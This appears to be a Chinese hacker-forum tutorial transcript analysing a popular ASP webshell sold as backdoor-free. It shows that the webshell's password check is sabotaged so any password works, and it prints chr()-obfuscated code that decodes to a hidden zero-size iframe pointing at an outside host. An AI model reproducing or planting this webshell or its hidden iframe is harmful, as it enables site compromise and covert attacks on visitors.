关于十三的ASP木马~!
黑客动画吧是个很不错的网站~ 教程每天都有更新`!
http://www.hack58.com:88/
忘了做自我介绍` 我叫ThreeCountrys 叫我TC也可以`!我先声明`我是菜鸟
希望高手多多指教` 我很喜欢交朋友的`! 呵呵`!
今天晚上没什么事做`就看看以前的ASP木马`! 在网上也找了下`因为不免杀了`!呵呵
十三WEBSHELL终结版无后门源代码.asp
大家对这个很熟悉吧`
网上最近好象很流行用这个的! 我们下下来看看`! 这里我已经下好了~!我们看下源代码~!
大家看到了吧~ 这个是没有加密的` 完整的源文件``
我们来试下`~ 不好意思` 我在网吧` 限制了很多` 我还不知道IP`现在看一下~ 呵呵`!
192.168.0.45 我们来连接这个ASP木马` 一切正常` 我们来找它的密码进去看下~!
密码123321 呵呵都没问题噢~ 因为我在网吧`现在也没工具~看不到端口了` 所以这个我就不演示
我们现在退出来` 没问题吧` 我随便用个密码试下` 三点会技术第九十 就是这几个字`!
看到没` 照样可以进`
昏` 怎么随便输入密码都可以进?
呵呵`我们来看看它的代码`!
RRS"<br><a href='javas cript:history.back()'><br> " & Err.Des cription & "</a><br>"
Err.Clear:Response.Flush
RRS SI
End Function
if session("web2a2dmin")<>UserPass then
if request.form("pass")<>"" then
if Serinf(request.form("pass"),pn)=UserPass then
session("web2a2dmin")=UserPass
response.redirect url
else
rrs"非法登录"
end if
else
si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><a href='"&SiteURL&"' target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>密码:<input name='pass' type='password' size='22'> <input type='submit' value='登录'></form><hr>"&Copyright&"</div></center>"
RRS sI
看到了吗` 这段就是用于加密密码的函数~!可是代码是被修改过的` 根本没能加密密码`
对不起,密码验证失败!
我们在试下我改过的~! 看到没` 就是这段~!改过后就可以了~需要验证~!
然后我们在看看源代码`!
m=chr(60)&chr(105)&chr(102)&chr(114)&chr(97)&chr(109)&chr(101)&m&mm&mmm&mmmm
mm=chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(104)
mmm=chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(109)&chr(111)&chr(114)&chr(102)&chr(105)&chr(46)&chr(99)&chr(110)
mmmm=chr(47)&chr(49)&chr(46)&chr(104)&chr(116)&chr(109)&chr(32)&chr(119)&chr(105)&chr(100)&chr(116)&chr(104)&chr(61)&chr(48)&chr(32)&chr(104)&chr(101)&chr(105)&chr(103)&chr(104)&chr(116)&chr(61)&chr(48)&chr(62)&chr(60)&chr(47)&chr(105)&chr(102)&chr(114)&chr(97)&chr(109)&chr(101)&chr(62)
这些都是ASCII码` 这个需要我们一一的对照` 在网上可以找的出来`
我先举个例子`chr(60)&
对应的ASCII码 〈
当你把这些代码全部转换过来之后` 你会发现你在使用什么东西`因为过程要很长时间
我就不给一一改过来了`&这个是连接符号`
相信大家应该都知道` 呵呵` 算我多嘴了`
呵呵`这里演示的就是我们经常用到的~十三的ASP木马无后门版`
算了` 我还是改下吧~ 等等`!哎呀真的不好意思` 还是麻烦你们自己去看咯`
我先把那些代码删了在试下` 现在除了没有改加密函数以外` 其它一切正常吧~!
呵呵` 看到了吗`
好了教程就到这里`没有问题吧~
谢谢大家`
谢谢`黑客动画吧- 呵呵` 希望大家都来学习`
我的QQ:598208726 群:34042340
呵` 我真的很需要个师傅` 帮帮我` 不知道有没有人愿意`
88